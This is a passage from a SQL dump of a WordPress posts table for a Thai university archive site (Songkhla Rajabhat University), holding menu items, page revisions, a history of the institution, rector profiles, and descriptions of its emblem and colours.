(30, 1, '2019-05-26 09:33:18', '2019-05-26 02:33:18', ' ', '', '', 'publish', 'closed', 'closed', '', '30', '', '', '2019-05-27 09:12:21', '2019-05-27 02:12:21', '', 0, 'http://172.17.40.11/wp511/?p=30', 9, 'nav_menu_item', '', 0),
(31, 1, '2019-05-26 09:33:18', '2019-05-26 02:33:18', ' ', '', '', 'publish', 'closed', 'closed', '', '31', '', '', '2019-05-27 09:12:21', '2019-05-27 02:12:21', '', 0, 'http://172.17.40.11/wp511/?p=31', 10, 'nav_menu_item', '', 0),
(32, 1, '2019-05-26 09:33:18', '2019-05-26 02:33:18', ' ', '', '', 'publish', 'closed', 'closed', '', '32', '', '', '2019-05-27 09:12:21', '2019-05-27 02:12:21', '', 0, 'http://172.17.40.11/wp511/?p=32', 11, 'nav_menu_item', '', 0),
(33, 1, '2019-05-26 09:33:19', '2019-05-26 02:33:19', ' ', '', '', 'publish', 'closed', 'closed', '', '33', '', '', '2019-05-27 09:12:21', '2019-05-27 02:12:21', '', 0, 'http://172.17.40.11/wp511/?p=33', 12, 'nav_menu_item', '', 0),
(34, 1, '2019-05-26 09:33:19', '2019-05-26 02:33:19', ' ', '', '', 'publish', 'closed', 'closed', '', '34', '', '', '2019-05-27 09:12:21', '2019-05-27 02:12:21', '', 0, 'http://172.17.40.11/wp511/?p=34', 13, 'nav_menu_item', '', 0),
(35, 1, '2019-05-26 09:33:19', '2019-05-26 02:33:19', ' ', '', '', 'publish', 'closed', 'closed', '', '35', '', '', '2019-05-27 09:12:21', '2019-05-27 02:12:21', '', 0, 'http://172.17.40.11/wp511/?p=35', 14, 'nav_menu_item', '', 0),
(36, 1, '2019-05-26 09:46:56', '0000-00-00 00:00:00', '{\n    "twentyseventeen::page_layout": {\n        "value": "two-column",\n        "type": "theme_mod",\n        "user_id": 1,\n        "date_modified_gmt": "2019-05-26 02:46:56"\n    }\n}', '', '', 'auto-draft', 'closed', 'closed', '', 'a225157d-8e4c-43a2-991d-1b5c7f7d54c9', '', '', '2019-05-26 09:46:56', '0000-00-00 00:00:00', '', 0, 'http://172.17.40.11/wp511/?p=36', 0, 'customize_changeset', '', 0),
(38, 1, '2019-05-26 09:58:59', '2019-05-26 02:58:59', '', 'หน้าแรก', '', 'publish', 'closed', 'closed', '', '38', '', '', '2019-05-27 09:12:21', '2019-05-27 02:12:21', '', 0, 'http://172.17.40.11/wp511/?p=38', 1, 'nav_menu_item', '', 0),
(39, 1, '2019-05-26 09:59:35', '2019-05-26 02:59:35', '<h1><strong>จดหมายเหตุ มหาวิทยาลัยราชภัฏสงขลา</strong></h1>\r\nบันทึกเรื่องราวต่างๆ ของมหาวิทยาลัยราชภัฏสงขลา เช่น ประวัติ, สี, ตรา, ดอกไม้, ต้นไม้, เพลง, ครุยวิทยะฐานะ, ทำเนียบผู้บริหาร, อาจารย์เกษียณอายุราชการ, บัณฑิตกิตติมศักดิ์, บุคคลดีเด่น, เหตุการณ์ ข่าว, ภาพแห่งความทรงจำ, ผลงานอาจารย์ นักศึกษา, เอกสารเผยแพร่ ของมหาวิทยาลัยราชภัฏสงขลา\r\n\r\n[caption id="attachment_11" align="aligncenter" width="234"]<a href="http://www.skru.ac.th" target="_blank" rel="noopener noreferrer"><img class="wp-image-11 size-medium" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/logoSKRU-S-1-234x300.png" alt="" width="234" height="300" /></a> เว็บไซต์มหาวิทยาลัยราชภัฏสงขลา[/caption]\r\n\r\n<img class="size-medium wp-image-7 aligncenter" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/skru-300x158.jpg" alt="" width="300" height="158" />\r\n\r\nhttps://youtu.be/0uxQkIus27A\r\n\r\n<iframe style="border: 0;" src="https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1979.303436371049!2d100.61276115648289!3d7.171360398979742!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x304d32ce87369b7f%3A0x3c6b99e70c86f3ab!2z4Lih4Lir4Liy4Lin4Li04LiX4Lii4Liy4Lil4Lix4Lii4Lij4Liy4LiK4Lig4Lix4LiP4Liq4LiH4LiC4Lil4Liy!5e0!3m2!1sth!2sth!4v1558839307053!5m2!1sth!2sth" width="600" height="450" frameborder="0" allowfullscreen="allowfullscreen"></iframe>', '', '', 'inherit', 'closed', 'closed', '', '5-revision-v1', '', '', '2019-05-26 09:59:35', '2019-05-26 02:59:35', '', 5, 'http://172.17.40.11/wp511/?p=39', 0, 'revision', '', 0),
(40, 1, '2019-05-26 12:28:18', '2019-05-26 05:28:18', '<img class="size-medium wp-image-41 aligncenter" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/person25-192x300.jpg" alt="" width="192" height="300" />\r\n<p style="text-align: center;"><strong>ผศ.ดร.นิวัต กลิ่นงาม</strong></p>\r\n<p style="text-align: center;">อธิการบดีลำดับที่ 25</p>\r\n<p style="text-align: center;">อธิการบดีมหาวิทยาลัยราชภัฏสงขลา พ.ศ.2560 - ปัจจุบัน</p>', 'ผศ.ดร.นิวัต กลิ่นงาม', '', 'trash', 'closed', 'open', '', '%e0%b8%9c%e0%b8%a8-%e0%b8%94%e0%b8%a3-%e0%b8%99%e0%b8%b4%e0%b8%a7%e0%b8%b1%e0%b8%95-%e0%b8%81%e0%b8%a5%e0%b8%b4%e0%b9%88%e0%b8%99%e0%b8%87%e0%b8%b2%e0%b8%a1__trashed', '', '', '2019-05-27 08:36:34', '2019-05-27 01:36:34', '', 0, 'http://172.17.40.11/wp511/?p=40', 0, 'post', '', 0),
(41, 1, '2019-05-26 10:05:57', '2019-05-26 03:05:57', '', 'person25', '', 'inherit', 'open', 'closed', '', 'person25', '', '', '2019-05-26 10:05:57', '2019-05-26 03:05:57', '', 40, 'http://172.17.40.11/wp511/wp-content/uploads/2019/05/person25.jpg', 0, 'attachment', 'image/jpeg', 0),
(42, 1, '2019-05-26 10:06:18', '2019-05-26 03:06:18', '<img class="size-medium wp-image-41 aligncenter" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/person25-192x300.jpg" alt="" width="192" height="300" />\r\n<p style="text-align: center;">อธิการบดีลำดับที่ 25</p>\r\n<p style="text-align: center;">อธิการบดีมหาวิทยาลัยราชภัฏสงขลา พ.ศ.2560 - ปัจจุบัน</p>', 'ผศ.ดร.นิวัต กลิ่นงาม', '', 'inherit', 'closed', 'closed', '', '40-revision-v1', '', '', '2019-05-26 10:06:18', '2019-05-26 03:06:18', '', 40, 'http://172.17.40.11/wp511/?p=42', 0, 'revision', '', 0),
(43, 1, '2019-05-26 10:06:54', '2019-05-26 03:06:54', '<img class="size-medium wp-image-41 aligncenter" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/person25-192x300.jpg" alt="" width="192" height="300" />\r\n<p style="text-align: center;">ผศ.ดร.นิวัต กลิ่นงาม</p>\r\n<p style="text-align: center;">อธิการบดีลำดับที่ 25</p>\r\n<p style="text-align: center;">อธิการบดีมหาวิทยาลัยราชภัฏสงขลา พ.ศ.2560 - ปัจจุบัน</p>', 'ผศ.ดร.นิวัต กลิ่นงาม', '', 'inherit', 'closed', 'closed', '', '40-revision-v1', '', '', '2019-05-26 10:06:54', '2019-05-26 03:06:54', '', 40, 'http://172.17.40.11/wp511/?p=43', 0, 'revision', '', 0),
(44, 1, '2019-05-26 10:07:06', '2019-05-26 03:07:06', '<img class="size-medium wp-image-41 aligncenter" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/person25-192x300.jpg" alt="" width="192" height="300" />\r\n<p style="text-align: center;"><strong>ผศ.ดร.นิวัต กลิ่นงาม</strong></p>\r\n<p style="text-align: center;">อธิการบดีลำดับที่ 25</p>\r\n<p style="text-align: center;">อธิการบดีมหาวิทยาลัยราชภัฏสงขลา พ.ศ.2560 - ปัจจุบัน</p>', 'ผศ.ดร.นิวัต กลิ่นงาม', '', 'inherit', 'closed', 'closed', '', '40-revision-v1', '', '', '2019-05-26 10:07:06', '2019-05-26 03:07:06', '', 40, 'http://172.17.40.11/wp511/?p=44', 0, 'revision', '', 0),
(45, 1, '2019-05-26 11:06:45', '2019-05-26 04:06:45', '<img class="size-medium wp-image-7 aligncenter" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/skru-300x158.jpg" alt="" width="300" height="158" />\r\n\r\n        ประวัติมหาวิทยาลัยราชภัฏสงขลา มหาวิทยาลัยราชภัฏสงขลา เป็นสถาบันอุดมศึกษาที่เก่าแก่ที่สุดแห่งหนึ่งของภาคใต้ และเป็นสถาบันที่มีพัฒนาการอย่างต่อเนื่องตลอดมา ตั้งแต่ยังมีฐานะเป็นเพียงโรงเรียนฝึกหัดครูมณฑล จนกระทั่งเป็นมหาวิทยาลัยราชภัฏสงขลา ดังเช่นปัจจุบัน\r\n\r\n        ในปีพ.ศ.2462เมื่อธรรมการมณฑลนครศรีธรรมราชซึ่งขณะนั้นอยู่ที่สงขลา และธรรมการจังหวัดสงขลาได้คิดผลิตครูมณฑลขึ้นเพื่อให้ไปทำหน้าที่สอนในระดับประถมศึกษาจึงได้จัดตั้งโรงเรียนฝึกหัดครูมณฑลขึ้น โดยให้เรียนร่วมกับโรงเรียนประจำมณฑลนครศรีธรรมราช(คือโรงเรียนมหาวชิราวุธซึ่งขณะนั้นตั้งอยู่ที่บริเวณโรงเรียนวิเชียรชมในปัจจุบัน) รับนักเรียน จบชั้นประถมบริบูรณ์(ประถมปีที่3)เข้าเรียนตามหลักสูตรป.4,ป.5และป.6โดยเพิ่มวิชาครูเป็นพิเศษผู้สำเร็จการศึกษาตามหลักสูตรดังกล่าวเรียกว่าครูประกาศนียบัตรมณฑล\r\n\r\nในปี พ.ศ. 2464 มีการประกาศใช้พระราชบัญญัติประถมศึกษา ธรรมการมณฑลจึงได้จัดตั้งโรงเรียนฝึกหัดครูประจำมณฑลขึ้นโดยเฉพาะเมื่อ พ.ศ. 2468 โดยตั้งที่ตำบลท่าชะมวง อำเภอกำแพงเพชร (ปัจจุบันคืออำเภอรัตภูมิ) จังหวัดสงขลา เรียกว่าโรงเรียนฝึกหัดครูมูล (ปัจจุบันเป็นที่ตั้งของวิทยาลัยเกษตรกรรมและเทคโนโลยีสงขลา) โดยรับนักเรียนที่จบ ม.3 หรือครูที่ทางอำเภอและจังหวัดต่าง ๆ ส่งมาเรียน กำหนด 2 ปี สำเร็จแล้วจะได้รับประกาศนียบัตรวิชาชีพครูมูล(ป.)\r\n\r\nต่อมาได้มีพระราชบัญญัติว่าด้วยการบริหารแห่งราชอาณาจักรสยาม พ.ศ. 2476 ให้เลิกการแบ่งเขตการ ปกครองเป็นมณฑล โรงเรียนฝึกหัดครูมูลประจำ มณฑลนครศรีธรรมราชที่ท่าชะมวง จึงได้เปลี่ยนเป็นโรงเรียนฝึกหัดครูประกาศนียบัตรจังหวัด เมื่อปี พ.ศ. 2477 โดยรับนักเรียนที่เรียน ป.6 หรือ ม.2 (ตามแผน การศึกษาแห่งชาติ พ.ศ. 2475) เข้าเรียนมีกำหนด 2 ปี ครั้น พ.ศ. 2482 จึงได้เปลี่ยนมาเป็นรับนักเรียน ม.3 เข้าเรียน มีกำหนด 2 ปี ผู้สำเร็จการศึกษาจะได้ประกาศ นียบัตรจังหวัด (ว.)\r\n\r\nนอกจากนี้โรงเรียนฝึกหัดครูประกาศนียบัตรจังหวัด ยังรับนักเรียนที่เตรียมไว้เพื่อบรรจุเป็นครูประชาบาล ซึ่งทางจังหวัดต่าง ๆ ได้คัดเลือกนักเรียนที่จบ ป.4 จากตำบลทุรกันดารในจังหวัดนั้น ๆ มาเข้าเรียน มีกำหนด 3 ปี เมื่อสำเร็จการศึกษาแล้ว จะได้ประโยคครูประชาบาล (ป.บ.) และกลับไปเป็นครูในตำบลที่ตนมีภูมิ ลำเนาอยู่\r\n\r\nปี พ.ศ. 2482 โรงเรียนฝึกหัดครูประกาศนียบัตรจังหวัดสงขลา ได้ย้ายจากท่าชะมวงมาเรียนที่ตำบลคอหงส์ อำเภอหาดใหญ่ และในปี พ.ศ. 2490 ก็เปลี่ยน ฐานะจากโรงเรียนฝึกหัดครูประกาศนียบัตรจังหวัดเป็นโรงเรียนฝึกหัดครูมูลและมี การปรับปรุงหลักสูตรใหม่ โดยรับนักเรียนที่จบชั้นมัธยมปีที่ 6 หรือประโยคประกาศ นียบัตรครูมูล (ว.) เข้าเรียนต่ออีก 1 ปี สำเร็จแล้วจะได้รับประกาศนียบัตรครูมูล (ป.)\r\n\r\nต่อมาใน พ.ศ. 2498 ก็ได้เปิดสอนหลักสูตรประกาศนียบัตรวิชาการศึกษา โดยรับนักเรียนที่จบ ม.6 เข้าเรียน 2 ปี ผู้สำเร็จการศึกษาจะได้รับประกาศนียบัตร วิชาการศึกษา (ป.กศ.) และโรงเรียนฝึกหัดครูมูลสงขลาก็เปลี่ยนเป็นโรงเรียนฝึกหัดครูสงขลา จนกระทั่งเมื่อวันที่ 1 มิถุนายน พ.ศ.2499 จึงได้ย้ายมาตั้งอยู่ ณ บริเวณ บ้านเขารูปช้าง อำเภอเมือง จังหวัดสงขลา อันเป็นสถานที่ตั้งในปัจจุบันและได้ยกฐานะเป็นวิทยาลัยครูสงขลา เมื่อวันที่ 1 พฤษภาคม พ.ศ. 2504 อีกทั้งได้ขยายชั้น เรียนไปจนถึงระดับประกาศนียบัตรวิชาการศึกษาชั้นสูง (ป.กศ.สูง) ในปีเดียวกันนั้นเอง\r\n\r\nครั้นเมื่อถึงปี พ.ศ. 2518 รัฐบาลได้ประกาศใช้พระราชบัญญัติวิทยาลัยครู พ.ศ. 2518 ทำให้วิทยาลัยครูสงขลาเปิดสอนถึงระดับปริญญาตรี ในสาขาครุศาสตร์ โดยรับนักศึกษาที่เรียนจบ ป.กศ.สูง หรือครูประจำการ ที่ได้รับวุฒิ พ.ม. เข้าศึกษาต่อ 2 ปี ผู้สำเร็จการศึกษาจะได้รับวุฒิครุศาสตรบัณฑิต (ค.บ.) และในปี พ.ศ.2522 ก็ได้เปิดโครงการอบรมครูประจำการและบุคลากรทางการศึกษา (อ.ค.ป.)ในระดับ ป.กศ.ชั้นสูงและระดับปริญญาตรี (ค.บ.)หลังจากนั้นในปี พ.ศ.2524 ก็ได้ร่วมมือกับ มหาวิทยาลัยสงขลานครินทร์ เปิดสอนหลักสูตรการโรงแรมและการท่องเที่ยว กับหลักสูตรการเพาะเลี้ยงสัตว์น้ำโดยเรียกโครงการนี้ว่า วิทยาลัยชุมชนสงขลา\r\n\r\nต่อมาในปี พ.ศ.2527 รัฐบาลได้ประกาศใช้พระราชบัญญัติวิทยาลัยครู พ.ศ. 2527 ให้วิทยาลัยครูทำหน้าที่ผลิตครูและเปิดสอนวิชาชีพ ตามความต้องการและ ความจำเป็นของท้องถิ่น วิทยาลัยครูสงขลา จึงได้ผลิตครูระดับปริญญาตรี ครุศาสตรบัณฑิต และบัณฑิตหรือประกาศนียบัตรวิชาชีพอื่นๆ ตามความต้องการและความ จำเป็น ของท้องถิ่นตั้งแต่บัดนั้นเป็นต้นมา และในปี พ.ศ. 2529 ได้เปิดการศึกษาสำหรับบุคลากรประจำการ (กศ.บป.) ในระดับอนุปริญญาและระดับปริญญาตรีสาขา ครุศาสตร์ ซึ่งต่อมาก็ได้ขยายไปสู่สาขาอื่น ๆ คือ ศิลปศาสตร์ และ วิทยาศาสตร์ ดังที่เป็นอยู่ในปัจจุบัน\r\n\r\nประวัติศาสตร์แห่งการเปลี่ยนแปลงครั้งสำคัญ ของสถาบันการศึกษาแห่งนี้ได้เกิดขึ้นอีกครั้งเมื่อ พระบาทสมเด็จพระเจ้าอยู่หัว ทรงพระกรุณาโปรดเกล้า ฯ พระ- ราชทานนาม “ ราชภัฏ ” แทนชื่อวิทยาลัยครูทั่วประเทศ เมื่อวันที่ 14 กุมภาพันธ์ พ.ศ. 2535 ทำให้วิทยาลัยครูสงขลา เปลี่ยนชื่อ สถาบันราชภัฏสงขลา ตั้งแต่บัดนั้น เป็นต้นมา สถาบันราชภัฏสงขลาได้มีความเจริญก้าวหน้ามาเป็นลำดับ จนสามารถเปิดสอนถึงระดับบัณฑิตศึกษาได้ในปี พ.ศ. 2544 และเมื่อวันที่ 15 มิถุนายน พ.ศ. 2547 ก็ได้รับการยกฐานะเป็น มหาวิทยาลัยราชภัฏสงขลา ในที่สุด โดยผู้ช่วยศาสตราจารย์ ดร.ไพโรจน์ ด้วงวิเศษ ดำรงตำแหน่งอธิการบดี', 'ประวัติมหาวิทยาลัยราชภัฏสงขลา', '', 'inherit', 'closed', 'closed', '', '17-revision-v1', '', '', '2019-05-26 11:06:45', '2019-05-26 04:06:45', '', 17, 'http://172.17.40.11/wp511/?p=45', 0, 'revision', '', 0),
(46, 1, '2019-05-26 11:10:58', '2019-05-26 04:10:58', '<h1><strong>จดหมายเหตุ มหาวิทยาลัยราชภัฏสงขลา</strong></h1>\r\nบันทึกเรื่องราวต่างๆ ของมหาวิทยาลัยราชภัฏสงขลา เช่น ประวัติ, สี, ตรา, ดอกไม้, ต้นไม้, เพลง, ครุยวิทยะฐานะ, ทำเนียบผู้บริหาร, อาจารย์เกษียณอายุราชการ, บัณฑิตกิตติมศักดิ์, บุคคลดีเด่น, เหตุการณ์ ข่าว, ภาพแห่งความทรงจำ, ผลงานอาจารย์ นักศึกษา, เอกสารเผยแพร่ ของมหาวิทยาลัยราชภัฏสงขลา\r\n\r\n[caption id="attachment_11" align="aligncenter" width="234"]<a href="http://www.skru.ac.th" target="_blank" rel="noopener noreferrer"><img class="wp-image-11 size-medium" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/logoSKRU-S-1-234x300.png" alt="" width="234" height="300" /></a> เว็บไซต์มหาวิทยาลัยราชภัฏสงขลา[/caption]\r\n\r\n<img class="size-medium wp-image-7 aligncenter" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/skru-300x158.jpg" alt="" width="300" height="158" />\r\n\r\nhttps://youtu.be/0uxQkIus27A\r\n\r\n<iframe style="border: 0;" src="https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1979.303436371049!2d100.61276115648289!3d7.171360398979742!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x304d32ce87369b7f%3A0x3c6b99e70c86f3ab!2z4Lih4Lir4Liy4Lin4Li04LiX4Lii4Liy4Lil4Lix4Lii4Lij4Liy4LiK4Lig4Lix4LiP4Liq4LiH4LiC4Lil4Liy!5e0!3m2!1sth!2sth!4v1558839307053!5m2!1sth!2sth" width="600" height="450" frameborder="0" allowfullscreen="allowfullscreen"></iframe>', 'หน้าแรก', '', 'inherit', 'closed', 'closed', '', '5-revision-v1', '', '', '2019-05-26 11:10:58', '2019-05-26 04:10:58', '', 5, 'http://172.17.40.11/wp511/?p=46', 0, 'revision', '', 0),
(47, 1, '2019-05-26 12:09:57', '2019-05-26 05:09:57', '', 'หน้าแรก', '', 'publish', 'closed', 'closed', '', '47', '', '', '2019-05-26 13:49:57', '2019-05-26 06:49:57', '', 0, 'http://172.17.40.11/wp511/?p=47', 1, 'nav_menu_item', '', 0),
(62, 1, '2019-05-26 12:27:44', '2019-05-26 05:27:44', '<p style="text-align: center;"><img class="size-medium wp-image-63 aligncenter" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/person24-192x300.jpg" alt="" width="192" height="300" />\r\nรศ.ดร.สุนทร โสตถิพันธุ์\r\nอธิการบดี ลำดับที่ 24\r\nอธิการบดีมหาวิทยาลัยราชภัฏสงขลา พ.ศ. 2556 - 2560</p>', 'รศ.ดร.สุนทร โสตถิพันธุ์', '', 'trash', 'closed', 'open', '', '%e0%b8%a3%e0%b8%a8-%e0%b8%94%e0%b8%a3-%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3-%e0%b9%82%e0%b8%aa%e0%b8%95%e0%b8%96%e0%b8%b4%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b8%b8%e0%b9%8c__trashed', '', '', '2019-05-27 08:36:34', '2019-05-27 01:36:34', '', 0, 'http://172.17.40.11/wp511/?p=62', 0, 'post', '', 0),
(63, 1, '2019-05-26 12:27:25', '2019-05-26 05:27:25', '', 'person24', '', 'inherit', 'closed', 'closed', '', 'person24', '', '', '2019-05-26 12:27:25', '2019-05-26 05:27:25', '', 62, 'http://172.17.40.11/wp511/wp-content/uploads/2019/05/person24.jpg', 0, 'attachment', 'image/jpeg', 0),
(64, 1, '2019-05-26 12:27:44', '2019-05-26 05:27:44', '<p style="text-align: center;"><img class="size-medium wp-image-63 aligncenter" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/person24-192x300.jpg" alt="" width="192" height="300" />\r\nรศ.ดร.สุนทร โสตถิพันธุ์\r\nอธิการบดี ลำดับที่ 24\r\nอธิการบดีมหาวิทยาลัยราชภัฏสงขลา พ.ศ. 2556 - 2560</p>', 'รศ.ดร.สุนทร โสตถิพันธุ์', '', 'inherit', 'closed', 'closed', '', '62-revision-v1', '', '', '2019-05-26 12:27:44', '2019-05-26 05:27:44', '', 62, 'http://172.17.40.11/wp511/?p=64', 0, 'revision', '', 0),
(65, 1, '2019-05-26 13:09:11', '2019-05-26 06:09:11', '<span style="color: #0000ff;"><strong>ตราสัญลักษณ์ประจำมหาวิทยาลัยราชภัฎสงขลา</strong></span>\r\n\r\n<img class="size-full wp-image-67 aligncenter" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/logoSKRU3.gif" alt="" width="180" height="220" />\r\n\r\nเป็นรูปวงรีสองวงล้อมตราพระราชลัญจกรของพระบาทสมเด็จพระเจ้าอยู่หัวภูมิพลอดุลยเดช ที่พระราชทานให้แก่มหาวิทยาลัยราชภัฏ ภายในวงรีด้านบนเป็นอักษรภาษาไทยเขียนว่า\r\n\r\n"มหาวิทยาลัยราชภัฏสงขลา" ด้านล่างเป็นอักษรภาษาอังกฤษเขียนว่า " SONGKHLA RAJABHAT UNIVERSITY"\r\n\r\n<img class="alignnone size-full wp-image-77" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/blue.png" alt="" width="77" height="40" /> สีน้ำเงิน แทนค่า สถาบันพระมหากษัตริย์ผู้ให้กำเนิด และพระราชทานนามมหาวิทยาลัยราชภัฏ\r\n\r\n<img class="alignnone size-full wp-image-79" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/green.png" alt="" width="77" height="40" /> สีเขียว แทนค่า แหล่งที่ตั้งของมหาวิทยาลัยราชภัฏ ทั้ง 36 แห่ง ในแหล่งธรรมชาติและสิ่งแวดล้อมที่สวยงาม\r\n\r\n<img class="alignnone size-full wp-image-78" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/gold.png" alt="" width="77" height="40" /> สีทอง แทนค่า ความเจริญรุ่งเรืองทางภูมิปัญญา\r\n\r\n<img class="alignnone size-full wp-image-80" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/orange.png" alt="" width="77" height="40" /> สีส้ม แทนค่า ความเจริญรุ่งเรืองของศิลปวัฒนธรรมท้องถิ่นที่ก้าวไกลใน 36 สถาบัน\r\n\r\n<img class="alignnone size-full wp-image-73" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/white.png" alt="" width="77" height="40" /> สีขาว แทนค่า ความคิดอันบริสุทธิ์ของนักปราชญ์แห่งพระบาทสมเด็จพระเจ้าอยู่หัว\r\n\r\n&nbsp;\r\n\r\n<span style="color: #0000ff;"><strong>สีประจำมหาวิทยาลัย</strong></span>\r\n\r\nสีแดง-ขาว\r\n\r\n<img class="alignnone size-full wp-image-72" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/red.png" alt="" width="77" height="40" /> สีแดง หมายถึง ความรัก ความเข้มแข็ง\r\n\r\n<img class="alignnone size-full wp-image-73" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/white.png" alt="" width="77" height="40" /> สีขาว หมายถึง ความถูกต้อง ความบริสุทธ์\r\n\r\nดังนั้น สีแดง - สีขาว หมายถึง นักศึกษาของมหาวิทยาลัยราชภัฏสงขลาทุกคนต้องกล้าคิด กล้าทำในสิ่งที่ถูกต้องดีงามด้วยความบริสุทธ์ใจ', 'สัญลักษณ์และสีประจำมหาวิทยาลัย', '', 'trash', 'closed', 'open', '', '%e0%b8%aa%e0%b8%b1%e0%b8%8d%e0%b8%a5%e0%b8%b1%e0%b8%81%e0%b8%a9%e0%b8%93%e0%b9%8c%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%88%e0%b8%b3%e0%b8%a1%e0%b8%ab%e0%b8%b2%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2__trashed', '', '', '2019-05-27 09:10:09', '2019-05-27 02:10:09', '', 0, 'http://172.17.40.11/wp511/?p=65', 0, 'post', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(66, 1, '2019-05-26 13:00:52', '2019-05-26 06:00:52', '<p class="hTitle" align="center">ตราสัญลักษณ์ประจำมหาวิทยาลัยราชภัฎสงขลา</p>\r\n\r\n<table border="0" width="90%" cellspacing="0" cellpadding="0" align="center">\r\n<tbody>\r\n<tr>\r\n<td><center><img class=" hvr-hang" src="https://www.skru.ac.th/th/assets/images/logoSKRU3.gif" width="200" height="256" /></center></td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<div class="style11" align="center"><span style="color: #0066cc; font-size: medium;"><strong>ตราสัญลักษณ์ประจำมหาวิทยาลัยราชภัฎสงขลา</strong></span></div></td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<table border="0" width="98%" cellspacing="0" cellpadding="0" align="center">\r\n<tbody>\r\n<tr>\r\n<td>\r\n<table border="0" width="100%" cellspacing="0" cellpadding="0" align="center">\r\n<tbody>\r\n<tr>\r\n<td valign="top" width="13%">\r\n<table border="1" width="90%" cellspacing="0" cellpadding="0" align="center">\r\n<tbody>\r\n<tr>\r\n<td bgcolor="130657"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td class="font_history" colspan="5"></td>\r\n<td class="font_history" width="87%">สีน้ำเงิน แทนค่า สถาบันพระมหากษัตริย์ผู้ให้กำเนิด และพระราชทานนามมหาวิทยาลัยราชภัฏ</td>\r\n</tr>\r\n<tr>\r\n<td valign="top"></td>\r\n<td colspan="6"></td>\r\n</tr>\r\n<tr>\r\n<td valign="top">\r\n<table border="1" width="90%" cellspacing="0" cellpadding="0" align="center">\r\n<tbody>\r\n<tr>\r\n<td bgcolor="004B1B"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td colspan="5"></td>\r\n<td class="font_history">สีเขียว แทนค่า แหล่งที่ตั้งของมหาวิทยาลัยราชภัฏ ทั้ง 36 แห่ง ในแหล่งธรรมชาติและสิ่งแวดล้อมที่สวยงาม</td>\r\n</tr>\r\n<tr>\r\n<td valign="top"></td>\r\n<td colspan="6"></td>\r\n</tr>\r\n<tr>\r\n<td valign="top">\r\n<table border="1" width="90%" cellspacing="0" cellpadding="0" align="center">\r\n<tbody>\r\n<tr>\r\n<td bgcolor="FCBD00"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td colspan="5"></td>\r\n<td class="font_history">สีทอง แทนค่า ความเจริญรุ่งเรืองทางภูมิปัญญา</td>\r\n</tr>\r\n<tr>\r\n<td valign="top"></td>\r\n<td colspan="6"></td>\r\n</tr>\r\n<tr>\r\n<td valign="top">\r\n<table border="1" width="90%" cellspacing="0" cellpadding="0" align="center">\r\n<tbody>\r\n<tr>\r\n<td bgcolor="F96726"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td colspan="5"></td>\r\n<td class="font_history">สีส้ม แทนค่า ความเจริญรุ่งเรืองของศิลปวัฒนธรรมท้องถิ่นที่ก้าวไกลใน 36 สถาบัน</td>\r\n</tr>\r\n<tr>\r\n<td valign="top"></td>\r\n<td colspan="6"></td>\r\n</tr>\r\n<tr>\r\n<td valign="top">\r\n<table border="1" width="90%" cellspacing="0" cellpadding="0" align="center">\r\n<tbody>\r\n<tr>\r\n<td bgcolor="#FFFFFF"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td colspan="5"></td>\r\n<td class="font_history">สีขาว แทนค่า ความคิดอันบริสุทธิ์ของนักปราชญ์แห่งพระบาทสมเด็จพระเจ้าอยู่หัว</td>\r\n</tr>\r\n<tr>\r\n<td valign="top"></td>\r\n<td colspan="6"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" height="15">\r\n<div align="center">\r\n\r\n<hr width="40%" />\r\n\r\n</div></td>\r\n</tr>\r\n<tr>\r\n<td valign="top" height="15"></td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<div align="center"><span style="color: #0066cc; font-family: Tahoma, MS Sans Serif, MS Dialog Light; font-size: medium;"><strong>สีประจำ มหาวิทยาลัยราชภัฏสงขลา คือ สีขาว - สีแดง</strong></span></div></td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<table border="0" width="98%" cellspacing="0" cellpadding="0" align="center">\r\n<tbody>\r\n<tr>\r\n<td>\r\n<table border="0" width="100%" cellspacing="0" cellpadding="0" align="center">\r\n<tbody>\r\n<tr>\r\n<td valign="top"></td>\r\n<td 